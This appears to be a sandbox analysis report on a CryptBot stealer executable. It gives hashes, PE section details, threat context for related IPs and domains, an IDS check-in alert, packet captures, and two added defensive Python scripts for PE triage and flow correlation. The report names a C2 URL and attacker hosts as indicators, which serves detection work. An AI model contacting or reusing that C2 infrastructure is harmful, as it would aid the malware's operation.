Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FYQ6Ee6gbS.exe (renamed because the original name is a hash value)
Original Sample Name: 1149dc52a38ac45de7ba2d62192c2918.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              No simulations
Context for IP 50.19.58.113
Match | Associated Sample Name / URL | Detection | Threat Name | Context
50.19.58.113 | Set-up.exe | malicious | Cryptbot |
50.19.58.113 | Set-up.exe | malicious | Cryptbot |
50.19.58.113 | Set-up.exe | malicious | Cryptbot |

Context for domain httpbin.org
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | Set-up.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | Set-up.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | Set-up.exe | malicious | Cryptbot | 50.19.58.113
httpbin.org | ebjtOH70jl.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 34.197.122.172
httpbin.org | random(3).exe | malicious | Cryptbot | 34.200.57.114
httpbin.org | random(5).exe | malicious | Cryptbot | 34.200.57.114
httpbin.org | Set-up.exe | malicious | Unknown | 34.200.57.114
httpbin.org | Set-up.exe | malicious | Unknown | 34.200.57.114
httpbin.org | TX5LAYBZRI.exe | malicious | Unknown | 34.200.57.114
httpbin.org | Prs9eAnu2k.exe | malicious | Unknown | 34.197.122.172

Context for ASN AMAZON-AESUS
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNX | malicious | Unknown | 54.225.69.136
AMAZON-AESUS | 3.elf | malicious | Unknown | 54.0.80.233
AMAZON-AESUS | http://www.jadavisinjurylawyers.com/ | malicious | Unknown | 52.5.148.85
AMAZON-AESUS | https://noiclethomas.wixsite.com/rice | malicious | Unknown | 54.196.108.80
AMAZON-AESUS | phish_alert_sp2_2.0.0.0(4).eml | malicious | Unknown | 52.70.64.64
AMAZON-AESUS | https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 52.70.64.64
AMAZON-AESUS | https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351 | malicious | Unknown | 23.23.209.126
AMAZON-AESUS | https://maya-lopez.filemail.com/t/XhcWEjoR | malicious | Unknown | 52.3.58.56
AMAZON-AESUS | https://www.shinsengumiusa.com/mrloskie | malicious | Unknown | 3.233.158.26
AMAZON-AESUS | SABXJ1B5c8.exe | malicious | MassLogger RAT | 44.221.84.105

Context for ASN VANNINVENTURESGB
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VANNINVENTURESGB | random(4).exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 176.53.146.223
VANNINVENTURESGB | random(3).exe | malicious | Cryptbot | 176.53.146.223
VANNINVENTURESGB | Prs9eAnu2k.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | joE9s9sbv0.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | JbN2WYseAr.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | ivHDHq51Ar.exe | malicious | Unknown | 176.53.146.223
VANNINVENTURESGB | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 176.53.146.212
VANNINVENTURESGB | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | 176.53.146.212
VANNINVENTURESGB | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | 176.53.146.212
VANNINVENTURESGB | s3hvuz3XS0.exe | malicious | Cryptbot | 176.53.146.212
                                    No context
                                    No context
                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.982731095598978
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: FYQ6Ee6gbS.exe
File size: 4'487'168 bytes
MD5: 1149dc52a38ac45de7ba2d62192c2918
SHA1: cb07a903a94b3d04813ae3ce1b24d48ddfb970ed
SHA256: 0b7e5470a3e798aeb45bf3e5abfa0873031828744b92ecca69ea3594db368237
SHA512: 2b772cd00d5cbc87cae39416c960f792740d82f9871e8d860841f3b49ecbb2aa9ba8f4d9dd6f1355a21387a5e25eeac18eae9ed4448c657c58533d9bce0ce299
SSDEEP: 98304:qaEbHfDFIUF0EqFRAFLlMY1bOjU0FH2SlbzF45ltBO47/WBK:qaEfFIUF0pgMYr82QF4ft0w/Ww
TLSH: 672633A916FB7478E02A8C74E8E72072C7B0F396589D4C104AE9567F46E3546372FD83
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a{g...............(..J...h..2...@........J...@..........................p.......AE...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0xfb4000
Entrypoint Section: .taggant
Digitally signed: true (the flag only reflects a non-zero IMAGE_DIRECTORY_ENTRY_SECURITY entry; that entry is a file offset, and 0x68b800 lies beyond the end of the 4'487'168-byte (0x447800) file, which is consistent with the empty signature fields below)
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x677B61DD [Mon Jan 6 04:53:49 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After:
Subject Chain:
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:
                                        Instruction
                                        jmp 00007FB418F2EDEAh
                                        orps xmm0, dqword ptr [eax+eax+00h]
                                        add byte ptr [eax], al
                                        add cl, ch
                                        add byte ptr [eax], ah
                                        add byte ptr [eax], al
                                        add byte ptr [ebx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [edx+ecx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add eax, 0000000Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [edx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx+00000080h], dh
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dh
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        and al, 00h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add eax, 0000000Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66005f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x65f000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x68b800 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbb214c | 0x10 | bqmneslf
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xbb20fc | 0x18 | bqmneslf
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x65e000 | 0x288800 | c94cea1bf64705266672d2833b82f620 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x65f000 | 0x1ac | 0x200 | e3fab847ed0cf782cbfb8086e8ed1b3a | False | 0.583984375 | data | 4.5230571413271505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x660000 | 0x1000 | 0x200 | bae83aff379a7254c53c159eb2418240 | False | 0.166015625 | data | 1.0989825165499407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x661000 | 0x396000 | 0x200 | 74d1bc028f824b05e6db6f30a1a870e8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bqmneslf | 0x9f7000 | 0x1bc000 | 0x1bb400 | fe580fc2210af5603c29b7611288d07d | False | 0.9946908708756346 | data | 7.9570043649451305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xbtqkxjw | 0xbb3000 | 0x1000 | 0x400 | cbcefa76695f29d87f3666579c6a36c5 | False | 0.8076171875 | data | 6.302415550636275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xbb4000 | 0x3000 | 0x2200 | 1aceead7c64c09b95c8ff22a92b7e1d8 | False | 0.09340533088235294 | DOS executable (COM) | 1.1341875546841558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
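The section table above is the raw material for several of the report's static findings: the two unnamed sections and bqmneslf, xbtqkxjw and .taggant all carry IMAGE_SCN_MEM_EXECUTE together with IMAGE_SCN_MEM_WRITE, bqmneslf has an entropy of 7.96, the first section declares 0x65e000 bytes of virtual size for 0x288800 bytes of raw data, and the entry point 0xfb4000 (RVA 0xbb4000 with image base 0x400000) sits in .taggant rather than in a code section. The following added example is not Joe Sandbox code and does not process the analysed sample; it reproduces those checks with a standard-library PE section parser and runs them over a PE32 image that build_sample_pe() constructs to mirror the layout. The 7.0 entropy threshold, the 4x virtual-to-raw ratio and the set of "standard" code section names are assumptions of this example, not values the report states.

```python
"""Static PE section triage reproducing the checks behind the report's section
table and entry-point finding, standard library only. Added example, not Joe
Sandbox code; the image it analyses is constructed here, not the real sample."""
import math
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code"}   # assumption: what counts as "standard"


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Return (entry_point_rva, [section dict]) for a PE32 or PE32+ image."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                # optional header follows the 20-byte COFF header
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i                  # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "va": va, "vsize": vsize, "raw": rawsize, "chars": chars,
            "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize]),
        })
    return entry_rva, sections


def triage(pe):
    """Return (section label, finding) pairs in the spirit of the report's signatures."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    for s in sections:
        name, chars = s["name"], s["chars"]
        label = name or "<unnamed>"
        if not name:
            findings.append((label, "unnamed section"))
        elif not all(ch.isalnum() or ch in "._$" for ch in name):
            findings.append((label, "section name contains special chars"))
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((label, "section is writable and executable (RWX)"))
        if chars & IMAGE_SCN_MEM_EXECUTE and s["entropy"] > 7.0:          # threshold is an assumption
            findings.append((label, "executable section with entropy %.2f (packed/encrypted)" % s["entropy"]))
        if s["raw"] and s["vsize"] > 4 * s["raw"]:                          # ratio is an assumption
            findings.append((label, "virtual size far exceeds raw size (runtime unpacking target)"))
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"]) and name not in STANDARD_CODE_SECTIONS:
            findings.append((label, "entry point lies outside standard code sections"))
    return findings


def build_sample_pe():
    """Constructed PE32 image (not the real sample) mirroring the report's layout:
    an unnamed RWX section with a large virtual size, a high-entropy RWX section
    and a .taggant section that holds the entry point."""
    RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    # (name, virtual address, virtual size, raw bytes, characteristics)
    layout = [
        (b"", 0x1000, 0x10000, bytes(512), RWX),                     # entropy 0.0, vsize >> raw
        (b"bqmneslf", 0x20000, 0x400, bytes(range(256)) * 4, RWX),   # entropy exactly 8.0
        (b".taggant", 0x30000, 0x200, b"\xE9" + bytes(255), RWX),    # entry point lands here
    ]
    hdr_len = 0x40 + 24 + 224 + 40 * len(layout)
    hdr_len = (hdr_len + 0x1FF) & ~0x1FF                 # round up to FileAlignment 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, 0x30000)              # AddressOfEntryPoint -> .taggant
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)   # ImageBase, SectionAlignment, FileAlignment
    headers, body, ptr = b"", b"", hdr_len
    for name, va, vsize, raw, chars in layout:
        raw = raw + bytes(-len(raw) % 0x200)              # pad raw data to FileAlignment
        headers += struct.pack("<8sIIIIIIHHI", name, vsize, va, len(raw), ptr, 0, 0, 0, 0, chars)
        body += raw
        ptr += len(raw)
    return (bytes(dos) + coff + bytes(opt) + headers).ljust(hdr_len, b"\0") + body


if __name__ == "__main__":
    for label, finding in triage(build_sample_pe()):
        print("%-10s %s" % (label, finding))
```

Point triage() at a real file with open(path, "rb").read() to get the same findings for the sample; the parser ignores the data directories and overlay, so the beyond-EOF security directory noted in the static information would need a separate check against len(pe).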
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xbb215c | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T06:36:26.951949+0100 | 2059018 | ET MALWARE CryptBot CnC Checkin | 1 | 192.168.2.8 | 49706 | 176.53.147.104 | 80 | TCP
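The Suricata hit above fires on the plaintext HTTP session to 176.53.147.104 (home.fivetj5vs.top), which in the packet list that follows opens roughly two and a half seconds after the TLS session to httpbin.org (50.19.58.113), and the C2 path recovered from memory at the top of this section ends in ten decimal digits. The following added example is not part of the Joe Sandbox report: it groups a handful of rows transcribed from the packet list into flows, attaches the alert to its flow, and decodes the ten-digit suffix as a Unix epoch (an assumption; the report does not say what the digits mean) for comparison with the PE TimeDateStamp 0x677B61DD. The ephemeral-port heuristic used to pick the client side is also an assumption.

```python
"""Flow summary and alert correlation for the report's packet list. Added
example, not Joe Sandbox code. PACKETS is a subset of rows transcribed from the
report, ALERT is its Suricata hit and C2_URL the path seen in process memory."""
import re
from datetime import datetime, timedelta, timezone

CET = timezone(timedelta(hours=1))          # the report's packet timestamps are CET (UTC+1)
COMPILE_TS = 0x677B61DD                     # PE TimeDateStamp from the static information
C2_URL = "http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767"
ALERT = ("2025-01-11T06:36:26.951949+0100", 2059018, "ET MALWARE CryptBot CnC Checkin",
         "192.168.2.8", 49706, "176.53.147.104", 80)
# timestamp | src port | dst port | src IP | dst IP (transcribed from the report's packet list)
PACKETS = """\
Jan 11, 2025 06:36:24.221633911 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.221748114 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:25.126172066 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:26.891994953 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.896923065 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.951948881 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:27.397404909 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
"""


def parse_ts(text):
    """'Jan 11, 2025 06:36:24.221633911 CET' -> aware datetime (nanoseconds truncated to micro)."""
    stamp, frac, zone = re.fullmatch(r"(.+)\.(\d+) (\w+)", text).groups()
    if zone != "CET":
        raise ValueError("unexpected zone " + zone)
    dt = datetime.strptime(stamp, "%b %d, %Y %H:%M:%S")
    return dt.replace(microsecond=int(frac[:6].ljust(6, "0")), tzinfo=CET)


def summarize_flows(rows):
    """Group packets into flows keyed (client, client_port, server, server_port).
    Heuristic (assumption): the endpoint on an ephemeral port (>= 49152) is the client."""
    flows = {}
    for line in rows.strip().splitlines():
        ts, sport, dport, src, dst = (c.strip() for c in line.split("|"))
        sport, dport, t = int(sport), int(dport), parse_ts(ts)
        if sport >= 49152 > dport:
            key, direction = (src, sport, dst, dport), "out"
        else:
            key, direction = (dst, dport, src, sport), "in"
        f = flows.setdefault(key, {"first": t, "last": t, "out": 0, "in": 0})
        f[direction] += 1
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
    return flows


def ordered_servers(flows):
    """Server IPs in the order their flows were opened: the network timeline."""
    return [k[2] for k, f in sorted(flows.items(), key=lambda kv: kv[1]["first"])]


def flow_for_alert(flows, alert):
    """Match an IDS alert to its flow; return (key, seconds after the flow's first packet)."""
    ts, _sid, _sig, src, sport, dst, dport = alert
    t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")
    key = (src, sport, dst, dport)
    if key not in flows:
        return None
    return key, (t - flows[key]["first"]).total_seconds()


def c2_epoch(url):
    """Decode the first run of ten digits in the C2 path as a Unix time.
    Assumption: the suffix is an epoch; the report does not state its meaning."""
    digits = re.search(r"\d{10}", url).group(0)
    return datetime.fromtimestamp(int(digits), tz=timezone.utc)


if __name__ == "__main__":
    flows = summarize_flows(PACKETS)
    for key, f in flows.items():
        print(key, f["out"], "out /", f["in"], "in, first", f["first"].isoformat())
    print("alert belongs to", flow_for_alert(flows, ALERT))
    when = c2_epoch(C2_URL)
    print("C2 suffix as epoch:", when.isoformat(), "compile stamp minus suffix:",
          COMPILE_TS - int(when.timestamp()), "s")
```

With the full packet list pasted into PACKETS the per-flow counters and first/last stamps give the dwell time of the check-in session without opening the PCAP; the alert lands about 60 ms after the SYN, i.e. on the first request of the session.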
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:36:24.221633911 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.221748114 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.221892118 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.252253056 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.252300024 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.907501936 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.908019066 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.908097029 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.909468889 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.909539938 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.911211967 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.911292076 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.921853065 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:24.921888113 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:24.973258972 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:25.068977118 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:25.069092035 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:25.069173098 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:25.126133919 CET | 49705 | 443 | 192.168.2.8 | 50.19.58.113
Jan 11, 2025 06:36:25.126172066 CET | 443 | 49705 | 50.19.58.113 | 192.168.2.8
Jan 11, 2025 06:36:26.891994953 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.896923065 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.896986961 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.897887945 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902749062 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902765036 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902793884 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902802944 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902810097 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902816057 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902826071 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902839899 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902857065 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902893066 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902899981 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902915001 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902940035 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902940989 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902965069 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.902970076 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.902986050 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.903019905 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907541990 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907641888 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907665014 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907691956 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907726049 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907738924 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907742977 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907767057 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907783985 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907794952 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907819986 CET | 80 | 49706 | 176.53.147.104 | 192.168.2.8
Jan 11, 2025 06:36:26.907824039 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907836914 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
Jan 11, 2025 06:36:26.907870054 CET | 49706 | 80 | 192.168.2.8 | 176.53.147.104
